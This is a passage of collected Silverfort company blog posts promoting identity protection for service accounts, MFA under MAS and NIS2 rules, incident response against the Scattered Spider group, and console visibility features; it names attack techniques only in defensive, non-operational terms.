policies. Silverfort’s policies enable the implementation of access management on service accounts, allowing only necessary access and blocking the rest. In addition, Silverfort can alert or block real-time access attempts that deviate from the expected behavior of each service account based on Silverfort’s AI risk engine. This allows service accounts to be restricted to their intended purpose with a Zero Trust approach and enforce an automated response to any unauthorized access attempt without modifying the service accounts or rotating their passwords. In this use case, if SVC_USER1 and SVC_USER2 were restricted, the credential theft would have had little to no impact.   4. Shadow Admins Mitigations  Silverfort automatically identifies shadow admin accounts that should be reviewed to determine whether their privileges are legitimate.   Silverfort enables visibility on all Active Directory (AD) and AD entities, including shadow admins. You can have a direct view of why a user is considered a shadow admin and the changes required to have it fixed. If an account’s permissions can’t be changed to avoid the threat, the account can be protected with MFA.   In this use case, if USER_A wasn’t a shadow admin, it would have been more restricted, making it more difficult for the attacker to move laterally under the radar.   Don(u)t Know Your Achilles Heel? In this blog post, I only detailed the relevant security gaps used in this attack path, but many more security gaps can easily turn into your Achilles’ heel. If these gaps apply to your network as well, don’t hesitate – fix them quickly as this could be you. If you currently don’t have the means to protect these gaps, you can request a demo from Silverfort here.   --- - Published: 2023-12-06 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/understanding-mas-regulations-and-the-imperative-of-service-account-protection/ In the dynamic landscape of financial services, regulatory frameworks play a pivotal role in ensuring stability, security, and fair practices. Singapore, with its reputation as a global financial hub, is no exception. The Monetary Authority of Singapore (MAS) stands at the forefront of regulatory efforts, setting guidelines to safeguard the integrity of the financial system. One crucial aspect that businesses must consider in order to comply with MAS regulations is service account protection. MAS Technology Risk Management Guidelines The Monetary Authority of Singapore (MAS) is Singapore's central bank and financial regulatory authority. MAS plays a crucial role in ensuring the stability, integrity, and development of the Singapore financial sector. The regulatory framework established by MAS covers a wide range of financial activities, including banking, insurance, securities, and the broader financial markets. The Technology Risk Management (TRM) Guidelines are a significant part of MAS regulations. These guidelines are designed to address the challenges and risks associated with the increasing reliance on technology in the financial industry. The TRM Guidelines provide a framework for financial institutions to manage technology risks effectively and ensure technology infrastructure resilience and security. MAS Guidelines: The Identity Protection Aspect As today’s threat landscape continues to evolve, we’re seeing an increasing trend in identity-based attacks that utilize compromised credentials for malicious access to resources. A number of these attacks occur both as standalone malicious acts, such as account takeovers, and critical components of larger-scale operations, such as lateral movement and ransomware propagation. These identity-based attacks pose a critical business risk in both cases. Acknowledging the different risks and challenges for financial institutions, the MAS guidelines include a dedicated access control section that explicitly deals with user access management, privileged access management, managing and protecting service accounts, and remote access management. It also makes multiple identity-related references in the context of cyber resilience, incident response, and auditing. Complying with these identity-related principles and practices would materially increase the financial institution's overall resilience to cyberattacks. MAS Highlights the Need for Service Account Protection One critical aspect of MAS regulations is the focus on privileged access management, which includes the protection of service accounts. Service accounts are special user accounts created for applications, services, or automated processes to interact with various systems and resources. These accounts often have elevated privileges to perform specific tasks without the need for human intervention. Examples include database access, system updates, and integration with external platforms. Despite their significance, service accounts can become potential security risks if not adequately protected. According to their framework in MAS Guidelines Section 9: Access Control 9. 2. 2, System and service accounts are used by operating systems, applications, and databases to interact or access other systems’ resources. The FI should establish a process to manage and monitor the use of system and service accounts for suspicious or unauthorised activities. While MAS regulations acknowledge the importance of service accounts, there is growing recognition that more attention needs to be given to their protection due to the vital role they play in the overall security framework. Service Account Protection Is Essential — Not a Nice to Have Service accounts are non-human or machine-to-machine (M2M) accounts used by applications, systems, and services to perform automated tasks in a network, often with privileged access. . Due to the critical role these accounts play within an enterprise environment, service account protection is vital to every cyber security strategy. If not properly managed, service accounts can pose significant risks. An attacker may compromise service accounts, take control of them, and then utilize their access privileges to move undetected throughout an environment. Service accounts can be inadvertently assigned a high level of privilege equivalent to an admin, creating a security issue if admins are not fully aware of the exact behavior and activity of those accounts. Further, organizations often lack full visibility into service accounts and how they are used, making it difficult to detect unauthorized access or malicious activity. Additionally, service accounts can't be subject to password rotation for various reasons; for example, they can be embedded in scripts and could break critical processes if their passwords are rotated. Therefore, service account protection is essential to prevent unauthorized access, detect malicious activity, manage high access privileges, and ensure the secure and efficient operation of automated tasks within a network. Silverfort's Service Account Protection Capabilities Silverfort automates the discovery, access control, and protection of all service accounts in the environment, providing organizations with granular visibility into every non-human identity and machine-to-machine authentication, as well as its sources, destinations, authentication protocols, and activity volume. Silverfort monitors the behavior of every service account and, upon detection of a risky deviation, can trigger an immediate response by either alerting or blocking access in real time. Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info With Silverfort's service account protection capabilities, service account management is automated and simplified while dramatically reducing the risk of security breaches caused by mismanaged service accounts. This is how Silverfort automates the entire service account life cycle: Automated Discovery Automatically discover all service accounts within the environment and map their sources, destinations, privilege levels, and common usage patterns. Activity Monitoring Continuously monitor service account activity in real time. This includes tracking and the usage patterns, access requests, and behavior of each service account. Any deviation from the service account’s standard behavior is immediately identified. Real-Time Protection Set access policies that alert or block access for single or multiple accounts whenever they deviate from their standard behavior. This prevents adversaries from using service accounts for malicious access, even if they have compromised them. Want to learn more about how Silverfort can assist you in complying with MAS service account requirements? Schedule a call with one of our experts or fill out this form for a pricing quote. --- - Published: 2023-11-30 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/service-account-protection-is-a-necessity-not-a-luxury/ The role of service accounts in today's complex enterprise environment cannot be overstated. These non-human or machine-to-machine (M2M) accounts are employed by applications, systems, and services to execute crucial automated tasks within a network. They require access to resources such as databases and file shares to perform their routine tasks. However, if not properly managed, service accounts can pose significant risks, enabling threat actors to exploit compromised credentials, take over these accounts, and move laterally through a network undetected.   The Role and Risks of Service Accounts  Service accounts are dedicated non-human accounts created by IT administrators to run on different machines or by processes such as software installation. They perform automatic, repetitive, and scheduled actions in the background, usually without human intervention. When a service account is created, it is typically assigned a set of permissions that allow it to perform specific tasks or access specific resources.   However, the features that make service accounts indispensable also make them a potential security risk. It is common for service accounts to be assigned privileged access similar to that of an administrator. While this access is necessary for the service account to perform its tasks, it can also create a security issue if administrators are not fully aware of the exact behavior and activity of those accounts.   Service Account Management  To effectively manage service accounts, you must discover all of the different account types that are being used. Service accounts can number in the hundreds or even thousands within an organization, making it difficult to keep track of each and every account and its activity. According to a report by Osterman, ‘The State of the Identity Attack Surface', only 22% of organizations feel that it's extremely important to know which service accounts exist in their environments. Alarmingly, only 19. 8% of organizations have complete confidence that they know which service accounts are in use in their environment. Understanding which service accounts are in your environment and what tasks they perform is critical as it helps prevent unauthorized access and lateral movement attacks by threat actors. It also enables effective management and security of these accounts, which often have privileged access.   Full Visibility into Service Accounts  As a result of the lack of full visibility into service accounts, it is difficult for organizations to detect any unauthorized access or malicious activity associated with them. According to Osterman's report, only 5. 7% of organizations have full visibility into their service accounts. Without full visibility into service accounts and how they are being used, organizations are exposed to security risks, including unauthorized access by threat actors, which can result in lateral movement attacks.   Since only a small percentage of organizations have full visibility into service accounts, service accounts are often seen as low-hanging fruit for attackers to gain access to an organization's environment and move laterally. In most organizations, this should be a serious concern for security leaders – yet only 17. 9% of organizations are extremely concerned about the lack of visibility into their service accounts.   Preventing Attacks Using Compromised Service Accounts The lack of robust security controls to prevent attacks using compromised service accounts represents a significant security gap in an organization's cybersecurity posture. When these accounts are not properly protected, they become attractive targets for malicious actors seeking unauthorized access. In Osterman's report, only 26. 2% of organizations have extreme confidence that their security controls can prevent service accounts from being compromised in real time. Without adequate controls, such as continuous monitoring, and strong access policies, compromised service accounts can go undetected, providing threat actors with prolonged access to critical systems and sensitive data. This gap in security controls not only increases the risk of data breaches but also amplifies the potential for operational disruptions and insider threats. Addressing this deficiency is crucial for organizations to fortify their defenses and ensure a resilient security framework against evolving cyber threats.   Priority & Resources Allocated to Service Account Protection Osterman's report indicates that 67. 9% of organizations are aware of the risks associated with service accounts, but they place higher priorities on other security initiatives. The need to prioritize resources and allocate budget for the protection of service accounts over other security initiatives is rooted in the recognition that they are prime targets for cyber threats. By prioritizing service account protection, organizations mitigate the risk of unauthorized access, data breaches, and operational disruptions. An investment in comprehensive security measures for service accounts provides a strong foundation for defending against evolving cyber threats and insider threats. Despite the importance of other security projects, securing service accounts is a proactive measure that ensures that the least detected security risks are prioritized for protecting against potential breaches and strengthening the overall identity security posture management of your organization.   The Urgent Need for Service Account Protection  Service accounts, often overlooked in the broader security landscape, wield significant influence over an organization's critical systems and sensitive data. As organizations begin to recognize the risk of leaving them undetected and unmonitored, the need for service account protection will cease to be a discretionary "nice-to-have" measure – and will instead emerge as a cornerstone of cyber security. Neglecting their protection introduces security risks that can lead to unauthorized access, operational disruptions, and potential data breaches. Recognizing the pivotal role that service accounts play in the identity infrastructure, it’s clear that prioritizing resources and allocating budget for their protection is not merely a strategic choice but a fundamental necessity. As cyber threats continue to evolve, investing in service account protection ensures the resilience, integrity, and security of an organization's users and resources, making it an indispensable element in a comprehensive cyber security strategy.   --- - Published: 2023-11-24 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/silverfort-secures-imda-accreditation-setting-new-standards-in-identity-protection/ We are thrilled to announce that Silverfort was accredited by the Infocomm Media Development Authority (IMDA) in Singapore. Silverfort's accreditation by IMDA demonstrates its commitment to security innovation and strong partnerships, which have contributed to our success. Since the accreditation process is designed to identify the best solutions in the market, every aspect of Silverfort's business was examined. As IMDA is known for accrediting only the best in its field through its rigorous process, we are pleased to note that Silverfort has been accredited with flying colors. By validating our tech product, market fit, and business models, we've established our credentials to gain more confidence from government and enterprise buyers in Singapore. What is IMDA and the significance of IMDA Accreditation The Infocomm Media Development Authority, or IMDA, is a Singaporean government agency responsible for driving the nation's digital transformation and fostering a vibrant digital economy. The IMDA Accreditation programme (launched in 2014) plays a key role in accelerating the growth of Singapore-based enterprise tech product companies. The program helps growth-stage Singapore-based tech companies succeed through strengthening their credibility through robust technical, financial, and operational evaluation, winning contracts with government agencies and large enterprises, as well as facilitating new growth capital into the companies. Achieving accreditation from IMDA speaks volumes about the quality and security of our identity protection solution. This recognition demonstrates that our technology aligns with Singapore's high standards for digital services and solutions, which are crucial in safeguarding both individuals and businesses in an increasingly digital world. The IMDA accreditation of Silverfort also enables several benefits, such as: Credibility and Trust: IMDA's stamp of approval establishes trust and credibility with potential clients and partners in Singapore. It assures them that Silverfort complies with the stringent standards set by the Singaporean government. Accreditation from IMDA opens the door to new opportunities and partnerships in the Singaporean market. As a result, we are able to collaborate with local businesses and government agencies, thereby expanding our footprint and reaching a wider audience. Regulatory Compliance: Being IMDA-accredited ensures that our solution complies with the relevant regulations and standards in Singapore. Silverfort's Key Capabilities Led to Gaining IMDA Accreditation Silverfort's journey to receiving IMDA accreditation represents our commitment to empowering organizations with more advanced identity protection. With our distinctive product capabilities, we have consistently distinguished ourselves in the Identity Protection landscape, making us a prime candidate for this prestigious recognition. Let's explore how Silverfort's key capabilities played a pivotal role in achieving IMDA accreditation. Extend MFA to All On-Prem and Cloud Resources Silverfort can apply Multi-factor Authentication (MFA) protection to any resource and access interface across on-prem and multi-cloud environments. This includes assets that could never have been protected before. Silverfort natively integrates with all IAM solutions within the hybrid environment to provide real-time monitoring and risk analysis for every user authentication and access request, including ones made by external vendors. Silverfort determines whether to allow, block or require MFA and If MFA is required, Silverfort notifies the MFA solution to push an MFA notification to the user. Based on the user’s response, Silverfort instructs the identity provider on whether the access request can be granted. Securing Service Accounts Silverfort provides comprehensive service account protection. It can automatically discover and secure all service accounts in an environment, continuously monitor their activity, and provide real-time insights into their risk level. Silverfort provides tailored access policies to each service account, and any deviation from the expected behavior can result in blocked access or an alert to the security team. This ensures that service accounts are fully protected without the need to rotate passwords, which can disrupt critical processes. Lateral Movement and Ransomware Protection Silverfort empowers organizations to prevent lateral movement attacks that utilize compromised credentials. Since Silverfort integrates with an identity provider's back end (rather than via agents or proxies on individual resources), it is able to detect suspicious activity across a network immediately and prevent it by triggering MFA. This includes the capability to enforce MFA on all resources that were not designed to support it. As a result, organizations are now able to respond to lateral movement in real time and stop ransomware threat actors in their tracks. Moving forward with IMDA Accreditation Silverfort's accreditation by IMDA is a testament to our commitment to providing complete identity protection to our customers as well as a gateway to new opportunities in the Singaporean market. It not only underscores our past achievements but also serves as a catalyst for future growth and innovation in the ever-evolving field of cybersecurity. As we continue to grow in the Singaporean market, we look forward to contributing to the national digital transformation, enhancing security, and providing robust identity protection to all businesses. Thanks to IMDA accreditation, Silverfort is ready to accelerate its business in Singapore, and we are looking forward to the journey ahead. --- - Published: 2023-11-23 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-identity-ir-playbook-against-scattered-spider-attacks/ Scattered Spider adversary group has been extremely active in the past month, increasing its outreach to financial and insurance entities. This group features an extensive and in-depth use of identity compromise in both the initial access and lateral movement stages. A sound defensive strategy against Scattered Spider should include a full lifecycle protection layer to reduce and monitor the identity attack surface, as well as detect, block, and respond to the use of compromised identities for malicious access. Silverfort’s threat research team has interacted closely with the identity threats used by Scattered Spider. This article presents the identity IR framework that was implemented, shedding light on the critical components that must be addressed to ensure the identity aspects of a Scattered Spider attack are efficiently addressed. What’s Different in the Identity Aspect of Incident Response? Where the malware aspect of IR focuses on detecting and removing malicious files and network IR is about detecting and blocking malicious traffic, the identity aspect of IR is about detecting and blocking lateral movement carried out by compromised user accounts. Let’s assume there’s a live incident going on. You know the adversaries have established a foothold in your network and are accessing resources within it. Now you need to identify compromised user accounts, stop the attackers from using them and ensure other resources are not being compromised as rapidly as possible. To do that efficiently you need to have full visibility, analysis and access control capabilities for authentications and access attempts that involve the following entities: User accounts including service accounts, domain admins and regular users. Identity infrastructure including domain controllers, federation servers, SaaS identity providers, PAM solutions and any other component that manages identities in your environment. Domain-joined machines, including IT and security infrastructure, workstations and servers. Silverfort is the first solution that provides IT teams with these capabilities in a single, easily deployed solution. Let’s understand how this is mapped to the NIST IR lifecycle used by most IR teams as a standard guideline. Mapping Identity Protection to the NIST IR Lifecycle Model The NIST IR framework divides the IR process to four parts: 1) preparation, 2) detection and analysis, 3) containment, eradication and discovery, 4) post-incident activity. In this example we will assume the Silverfort platform is only called in when an incident is fully active and wasn’t installed before, so we will focus on stages (2) and (3) only. Identity IR: Detection and Analysis This stage focuses on the identification of the compromised user accounts, identity infrastructure, and any other resource that has been accessed with the compromised entities. For this stage, Silverfort provides IR teams with a detailed Log Screen that includes an aggregated view into all authentications and access attempts made by all users to any cloud or on-prem resource. Every authentication is assigned a risk score by Silverfort’s risk engine, along with a wide range of filters to easily detect authentications that were initiated by malicious actors. Using these capabilities, the IR team can perform the following actions: Analyze the unified logs of AD and other on-prem, federation, and cloud directories to spot lateral movement attempts between the cloud and on-prem environments. Analyze the logs for hybrid service accounts (featuring both machine-to-machine communication as well as manual logins by human users) to detect anomalous activity or access attempts that Silverfort’s risk engine flags as malicious. Analyze the logs for infrastructure related service accounts to detect anomalous activity or access attempts that Silverfort’s risk engine flags as malicious (again due to Scattered Spider’s inclination towards infrastructure compromise). Silverfort’s integration with all identity providers in the environment means you can get all authentication logs made by any user to any on-prem or cloud resource via a single pane of glass.  Identity IR: Containment, Eradication and Recovery This stage comprises the bulk of the IR process and (as the name implies) this stage is about blocking the attackers from performing further advancement, eliminating their presence, and restoring things to how they were. Silverfort assists IR teams mainly with the containment and eradication parts of this stage by providing the following tools: Policy configuration screen where MFA and Block Access policies can be configured for any user account in the hybrid environment. This applies to any authentication type, including command line access over PsExec, PowerShell or WMI, which are typically used by adversaries. Dedicated screen for service account protection that provides automated visibility into all service accounts and enables the creation of access policies to block access or alert if they deviate from their standard behavior, which is a clear indication of compromise. Using these capabilities, IR teams can apply the following actions for the various entity types that were listed above: Service Accounts Discover all service accounts within the environment. Activate policies to block service accounts from accessing resources if they deviate from their standard behavior. Detect Kerberoasting attacks or when a service account interactive login is used. Configure policies to block access from VPN subnets.   Domain Admin Accounts Configure MFA policies for all admins and harden these policies by requiring FIDO tokens and number matching. Configure policies to deny access for built-in administrator and guest accounts. Configure policies to block access from VPN subnets.   All Users Accounts Use MFA or access block policies to temporarily restrict access attempts that use services such as termsrv, host, and CIFS to perform remote connections. Domain Controllers Reset the KRBTGT account’s password to mitigate potential Golden Ticket attack and eliminate the adversary’s foothold. Configure MFA policy for Windows logon to the DC to prevent remote logon. Configure policy to deny NTLM connection to the DC. Configure policy to Block DC access to all users except domain admins. Configure MFA policy to deny access for users without a registered MFA token to prevent future malicious access via social engineering. Federation/SaaS identity providers Configure MFA or block access policies for known malicious and unknown IPs. IT and Security Infrastructure Configure MFA policy to deny access for users without a registered MFA token. Other Domain-Joined Machines Discover existing NTLMv1 authentications and configure policy to deny access. Temporarily block all NTLMv2 authentications until detection and containment of compromised user accounts. Configure policy to restrict personal workstation access to critical resources (such as DC) only, and prevent connection between machines. Configure policy to require MFA for all access on any machine open to the Internet. Important: these containment activities are also detection activities, as any blocked authentication indicates that the initiating user account is compromised. Silverfort for Identity Threats: Post-Incident Activity and Preparation – Achieve Defense in Depth Sound defense against Scattered Spider should address all its parts, from the social engineering aspect to the unique malware this group employs (Bring Your Own Vulnerable Driver (BYOVD) attack via CVE-2015-2291, an old kernel vulnerability). Mobile and browser security solutions typically address the first while EDR addresses the latter. However, it’s imperative that the environment’s security architecture is fully equipped to confront identity infrastructure compromise, as well as detect and block malicious access with compromised accounts. It’s easy to see that most of the containment activities described above are also part of the preparation phase. In addition to the policy configuration capabilities, Silverfort also enables IR teams to proactively prepare their environment to tackle an identity threat, whether initiated by Scattered Spider or any other threat actor. For this, Silverfort provides IR teams with an Insights screen that aggregates all identity security weaknesses and exposures such as shadow admins, NTLMv1, unconstrained delegation and many others that threat actors typically abuse. Using this screen, the IR team can systematically harden the security posture of its environment. Conclusion: Identity Threat IR Tools and Practices are a Must Identity threats are becoming an integral part of adversaries’ arsenals. While Scattered Spider is a leader in that aspect, it is by no means the only one. As a result, IR teams must have the tools to conduct a rapid and efficient identity IR process. In the same way an EDR is the ultimate tool to address the malware aspect, a respective tool is required to pinpoint the compromised identities to contain the attack and eliminate malicious presence. Want to learn more about Silverfort’s identity IR capabilities? Schedule a call with one of our experts. --- - Published: 2023-11-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/comply-with-nis2-directive-mfa-requirements-with-silverfort/ In article 21, the NIS2 Directive defines the minimum set of security measures regulated entities must implement to comply with its requirements. Section 2(j) relates directly to Multi-Factor Authentication (MFA), stating that the security measures should include: ‘The use of multi-factor authentication or continuous authentication solutions, secured voice, video and text communications and secured emergency communication systems within the entity, where appropriate. ’ The interpretation of ‘where appropriate’ means wherever there is a likelihood that the lack of MFA protection could result in a cyber breach. In other words, entities should demonstrate that a) they have thoroughly assessed their identity attack surface to identify where malicious access performed by a threat actor is a critical threat, and b) mitigated this risk by enforcing MFA on these potential access attempts. Breakdown NIS2 MFA Requirements We can map the access points that need protection based on the following three aspects: User accounts – who are adversaries likely to target? Access methods – how do adversaries gain malicious access? Organizational resources – which resources are adversaries likely to target? These are the questions that you as an identity security stakeholder must first answer to determine where MFA protection is needed. To best answer them, we’ll need to adopt the attacker’s point of view, based on numerous attacks we’ve analyzed, investigated, and prevented. So, which users, access methods, and resources should you protect with MFA? Let’s examine them one by one. MFA for privileged users whose compromise bears the highest impact The compromise of privileged users is a prime goal for adversaries. These user accounts are entitled to access, execute code, and interact with data on multiple resources within the environment. In a typical environment these users are your admins, helpdesk, and IT teams, so placing MFA protection on these users is of paramount importance. MFA for PsExec and Remote PowerShell access used by attackers for lateral movement and ransomware spread Adversaries can use compromised credentials to perform lateral movement, scaling their initial access and spreading within the targeted environment. This spread is the key component behind mass ransomware and data theft attacks. Their tools of choice are command line access tools such as PsExec and Remote PowerShell. Enforcing MFA on users accessing resources via these tools is the ultimate protection against these attacks. MFA for all applications and servers that are critical to your organization’s operations Adversaries target critical resources to maximize the return on their investment, whether it is a ransomware attack that locks down mission-critical applications or the theft of sensitive business data or intellectual property. Identifying these resources and placing MFA protection on users’ access to them is thus a top priority.   Silverfort Unified Identity Protection Agentless MFA Silverfort is the provider of the first Unified Identity Protection platform that delivers real-time protection against identity threats that use compromised credentials for malicious access. Silverfort’s unique integration with Active Directory enables it to extend MFA to any authentication within the AD environments across any user, authentication protocol and resource. Native Integration with Active Directory Provides 100%MFA Coverage How is it done? AD forwards every incoming access request to Silverfort. Silverfort analyzes the access request against the access policies in place, as well as known attack patterns or anomalies that could indicate a potential compromise. Silverfort’s analysis determines whether to allow access, block it, or verify the user’s identity with MFA. If verification is needed, Silverfort contacts either its own or any 3rd party MFA service to verify that the actual user has initiated the access request. Following the user’s response, Silverfort tells AD if access is allowed. This architecture ensures full coverage of all authentications and access attempts within the protected environment. Silverfort Protection for NIS2 MFA Requirements: Critical User Accounts, Resources, and Access Methods Silverfort’s comprehensive MFA protection enables organizations to implement NIS2 MFA requirements. Let’s examine that in more detail: Silverfort’s MFA for Privileged Users Silverfort automates the discovery of all the users that belong to an administrative group and enables the configuration and enforcement of an MFA policy on these users in a single click. Moreover, Silverfort also discovers users that have been inadvertently assigned admin privileges (aka ‘Shadow Admins’) and configures policies that includes these users in the MFA protection. In that manner any adversarial attempt to leverage the compromised credentials of these users for malicious access will be blocked. Silverfort’s MFA for Command Line Access As explained earlier, Silverfort’s integration with AD enables it to extend MFA to all AD authentications. Until now, command line tools like PsExec and PowerShell were beyond the scope of traditional MFA solutions. This is because their legacy underlying authentication protocols, NTLM and Kerberos, don’t support the integration of MFA into their authentication process. Silverfort’s architecture obviates the protocol support issue because it’s able to analyze and gain insight into any authentication packet forwarded by AD. This makes Silverfort the only solution that can protect PsExec and PowerShell with MFA, effectively mitigating the risk of ransomware spread in the environment. Silverfort’s MFA for Legacy Applications Many organizations, especially in the verticals subject to specific cyber security standards such as the NIS2 directive, still rely on legacy applications for their core operations. Traditional MFA solutions are not a good fit here because incorporating MFA into these apps requires changes to the app’s source code – an operational risk most organizations are reluctant to take. However, again, Silverfort’s integration with AD enables it to seamlessly enforce MFA protection on any app that authenticates to AD, ensuring the organization’s critical resources have real-time protection against malicious access. Want to learn more about how Silverfort can assist you in complying with NIS2 MFA requirements? Schedule a call with one of our experts or fill this form for a pricing quote. --- - Published: 2023-10-24 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/how-silverfort-empowers-you-to-detect-and-resolve-identity-risks-with-zero-effort/ When it comes to protecting organizations from compromise, what does visibility mean? It’s a word often used in the security industry – yet it is rarely fully defined. In the context of identity protection, visibility is the ability to view and manage all data and security risks associated with a user account – and gain actionable insights from that information. This matters because, without full visibility into elements such as user and authentication activity, access permissions, risky identities, authorized applications, and so on, you could be leaving critical identity security gaps without even knowing it. In this post, we’ll highlight the different challenges organizations experience when they don’t have full visibility into their user's activity and authentication requests. Afterwards, we’ll show how Silverfort empowers customers to gain complete visibility across their environments enabling real-time detection and actionable insights into resolving identity risks with almost zero effort. Managing Users Comes with a Lack of Context & Visibility In most cases, a typical user is associated with several different identities across cloud or on-prem services in their organization's hybrid environment. Further, most user directories lack the tools to report on the data and risks associated with a particular identity. The vast amount of user data residing in systems like Active Directory or an organization's SIEM can make it daunting to track, manage, and monitor user identities, access permissions, and view activities effectively. Unfortunately, very few solutions can aggregate all inventory and identity data. This results in fragmented and incomplete information about who has access to what resources and how they are using them. As a result, even if security admins are aware of some or all of the identities and activities associated with a user, they might not have a clear understanding of what permissions have been assigned, inherited, or shared. This is a serious identity protection challenge. Due to this lack of visibility, potential identity-related risks may arise, such as unauthorized access or misuse of privileges. Without complete visibility into your users and their access capabilities, it becomes increasingly difficult to protect sensitive data and critical assets. This is why it is imperative to recognize that security truly starts with visibility. Silverfort Provides Complete Visibility to All Users Silverfort automatically discovers and protects all user accounts in a hybrid environment from identity-based threats and provides centralized visibility into every authentication and access request. As a result of Silverfort's native integrations with all identity providers, including Active Directory, it can log every authentication request. This provides a unified view of all network activity across every user and any resource in the hybrid environment. With complete visibility across all user activity, Silverfort's risk engine can determine the legitimacy of every authentication, so organizations can detect and respond to potential security threats in real-time — including blocking the access of any accounts that display anomalous behavior. This is just a glimpse into how Silverfort’s visibility capabilities can help you strengthen your identity security posture management. Now, let’s look at how you can gain visibility into all the users in the Silverfort console. Visibility of User Activity & Authentication Full User Context The Silverfort Logs screen provides full visibility into all user logs, authentication activity, and risk indicators. The moment Silverfort is integrated with your IDP, all user accounts are detected, allowing you to monitor their activity and associated risks. As each user is detected, their details are displayed, including username, risk level assigned by Silverfort, authentication type, Silverfort’s action, and the IdP result. Screenshot #1: Silverfort's authentication logs screen Filtering by Risk Indicators In the Logs screen, users can filter their logs according to account type or risk indicator. This allows user to view their users by the different risk indicators that have been detected and assigned by Silverfort’s risk engine. Silverfort supports many different users' risk indicators such as NTLMv1, kerberoasting, brute force, MFA bombing, Abnormal MFA activity, failed authentications, and many more. By filtering by risk indicator, you are empowered with complete visibility and insights into your risky users, and you can now remediate the different risk each user present. Here are two prominent risk indicators that many of our customers tend to filter by within their Silverfort console Logs screen: NTLMv1 What is it? NTLMv1 is the legacy version of the NTLMv2 protocol that is used today in Active Directory environments.   What makes it risky? NTLMv1 uses relatively weak encryption algorithms, which can be easily cracked by attackers that intercept its authentication traffic. This makes environments that use NTLMv1 critically exposed to compromise. Screenshot #2: Discovering all users using NTLMv1 How can Silverfort users apply this feature? Silverfort discovers all NTLMv1 authentications within an environment. Silverfort’s risk engine detects NTLMv1 authentications and flags them as a risk indicator, which can be used as a filter to uncover machines that perform similar authentications and also as an access policy trigger. Within the Authentication Logs screen, check the NTLMv1 Authentication box. Once checked, all matching authentications are displayed with all the authentication standard fields (source, destination, etc. ) that can be further enhanced with additional filters.   Screenshot #3: Filtering for NTLMv1 authentication in the logs screen As well as providing visibility into when NTLMv1 authentications are being used, Silverfort can also protect you and your organization by preventing the use of NTLMV1. Our blog post Silverfort Enables Organizations to Resolve the Risks of NTLMv1 details how you can protect against the use of NTLMv1 authentications. Shadow Admins What is it? Shadow admins are user accounts that either possess admin access or are capable of obtaining it, despite not being members of a documented admin group. IT teams are typically unaware of these accounts as there is no documentation of the excessive privileges they possess. What makes them risky? Since these accounts are not regarded as admin accounts by the IT team, they are not subject to common admin account security controls (PAM, MFA. , etc. ). This makes these accounts a lucrative target for adversaries that can easily compromise them and abuse their privileges for malicious access. How can I detect shadow admins with Silverfort? In Silverfort's Authentication Logs screen, add the Risk Indicator filter and check Shadow Admins. Click Apply and adjust the time range to suit your monitoring schedule This will display all shadow admins that have been added to the environment during this period. Screenshot #4: Filtering for shadow admins in the logs screen Upon discovering an account, you can click the investigation icon to see exactly which resources it has attempted to access since it was created. You can then decide whether to remove them entirely or remove their redundant permissions. Identity Security Posture Management Organizations can view the identity inventory of their environment in the insights screen of the Silverfort console, including users, resources, risky users, and more. Screenshot #5: Silverfort's Insights screen This screen displays the types of users and resources in your environment as well as the weaknesses in your security that adversaries may abuse to launch identity threats. Among these are the shadow admins, admin users with SPNs, accounts with passwords that do not expire, and many more. This screen enables you to gather actionable insights on your environment’s security posture and take action to resolve it, making it significantly harder for threat actors to attack your business. Real-Time Visibility is the Foundation of Identity Protection Complete visibility into resources and users across hybrid environments is becoming a top priority for organizations looking to adopt a proactive approach to identity protection. The good news is that with Silverfort, they can gain comprehensive visibility into their entire identity attack surface in an effortless, fully automated manner. This is the first step towards hardening your environment against identity threats and reducing the likelihood of a successful attack. Looking to gain complete visibility across your environment? Reach out to one of our experts here. --- - Published: 2023-10-01 - Modified: 2025-03-11 - URL: https://www.silverfort.com/blog/best-iam-tools/ As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems, and sensitive data. However, with a plethora of tools promising to streamline IAM, determining the right approach for an organization’s needs can be challenging. We recently released a first-of-its-kind global report on the identity attack surface, jointly prepared by Silverfort and Osterman Research – The State of the Identity Attack Surface: Insights into Critical Security Gaps. The report provides two key insights for security stakeholders: Identity is a highly targeted attack surface with compromised user credentials serving as the main attack vector. Security controls of this attack surface are poorly implemented in most organizations, leaving them at critical risk. What is Identity and Access Management (IAM)? IAM enables the right individuals to access the right resources at the right times for the right reasons. IAM tools provide authentication, authorization, and identity governance for an organization's digital assets, including data, applications, infrastructure, and connected devices. It consists of three components: authentication, authorization, and identity governance. Authentication verifies a user's identity, authorization determines their access privileges, and identity governance enforces compliance. Together, these components grant employees, partners, and customers appropriate access to organizational resources while reducing the risks of data breaches and cyber threats. Effective IAM is crucial for security and compliance. IAM presents a significant challenge for enterprises with many resources, users, and access requirements. Enterprise IAM tools streamline and govern identity and access across an organization. Key features include: Centralized user directory to manage employee and non-employee credentials in one place. Role-based access controls (RBAC) to minimize excessive permissions and ensure least privilege access. Workflow automation to approve, certify, and revoke access requests and access privileges according to defined policies. Audit reporting and analytics to monitor access, detect anomalies, and generate insights for risk mitigation. Integration with IT infrastructure and security tools to seamless IAM experience across domains. Scalability to handle tens of millions of identities, credentials, and access points without impacting performance or user experience. Flexible deployment to allow integration with existing infrastructure, including on-prem, cloud-based, and hybrid environments. The Identity Attack Surface and the Need for IAM Tools The identity attack surface includes all the organizational resources that can be accessed with user credentials. Therefore, attackers that possess user credentials will be able to use them for malicious access, account takeover, lateral movement, and ransomware spread. As cloud services, blockchain, IoT, and AI continue to grow in use, and cyber threats grow more sophisticated, IAM tools are becoming increasingly important. They enable organizations to effectively monitor and control authentication and authorization processes, enforce stringent security policies, and keep a vigilant eye on user activities and access patterns. The deployment of IAM tools is crucial to mitigate risks, ensure regulatory compliance, and protect sensitive data. To address the threat of attackers using compromised credentials for malicious access, IAM solutions need to incorporate a variety of tools and technologies, including multi-factor authentication (MFA), single sign-on (SSO), privileged access management (PAM), and thorough identity governance. Traditional or manual IAM processes fall short in addressing the sheer volume and complexity of modern networks. This leads to security gaps, operational inefficiencies, and a poor user experience. The best IAM tools incorporate an automated approach to identity management and security, and comprehensive account visibility. Consequently, IAM has emerged as a top priority for Chief Information Security Officers (CISOs) and security professionals aiming to fortify their cyber defense 